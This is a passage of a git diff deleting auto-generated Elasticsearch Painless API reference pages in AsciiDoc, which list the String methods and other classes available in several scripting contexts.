{java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-ingest-org-elasticsearch-ingest-common"] -=== Ingest API for package org.elasticsearch.ingest.common -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-ingest-Processors]] -==== Processors -* static long bytes(String) -* static Object json(Object) -* static void json(Map, String) -* static String lowercase(String) -* static String uppercase(String) -* static String urlDecode(String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-interval/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-interval/index.asciidoc deleted file mode 100644 index a967992d786..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-interval/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-interval]] -=== Interval API - -The following specialized API is available in the Interval context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-interval/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-interval/packages.asciidoc deleted file mode 100644 index c33acf7a257..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-interval/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-interval-java-lang"] -=== Interval API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-interval-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-moving-function/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-moving-function/index.asciidoc deleted file mode 100644 index ee7ebe2ed26..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-moving-function/index.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-moving-function]] -=== Moving Function API - -The following specialized API is available in the Moving Function context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.search.aggregations.pipeline -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-moving-function/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-moving-function/packages.asciidoc deleted file mode 100644 index a30c9fc6935..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-moving-function/packages.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-moving-function-java-lang"] -=== Moving Function API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-moving-function-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-moving-function-org-elasticsearch-search-aggregations-pipeline"] -=== Moving Function API for package org.elasticsearch.search.aggregations.pipeline -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-moving-function-MovingFunctions]] -==== MovingFunctions -* static double ewma(double[], double) -* static double holt(double[], double, double) -* static double holtWinters(double[], double, double, double, int, boolean) -* static double linearWeightedAvg(double[]) -* static double max(double[]) -* static double min(double[]) -* static double stdDev(double[], double) -* static double sum(double[]) -* static double unweightedAvg(double[]) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-number-sort/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-number-sort/index.asciidoc deleted file mode 100644 index a91a6af5f84..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-number-sort/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-number-sort]] -=== Number Sort API - -The following specialized API is available in the Number Sort context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-number-sort/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-number-sort/packages.asciidoc deleted file mode 100644 index 20157333a08..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-number-sort/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-number-sort-java-lang"] -=== Number Sort API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-number-sort-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-number-sort-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Number Sort API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-number-sort-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-number-sort-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Number Sort API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-number-sort-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-number-sort-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-painless-test/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-painless-test/index.asciidoc deleted file mode 100644 index 5ceee2904be..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-painless-test/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-painless-test]] -=== Painless Test API - -The following specialized API is available in the Painless Test context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-painless-test/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-painless-test/packages.asciidoc deleted file mode 100644 index ee58588b3ff..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-painless-test/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-painless-test-java-lang"] -=== Painless Test API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-painless-test-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/index.asciidoc deleted file mode 100644 index 1d2096b0f59..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-processor-conditional]] -=== Processor Conditional API - -The following specialized API is available in the Processor Conditional context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/packages.asciidoc deleted file mode 100644 index 66b5d475b75..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-processor-conditional/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-processor-conditional-java-lang"] -=== Processor Conditional API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-processor-conditional-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean 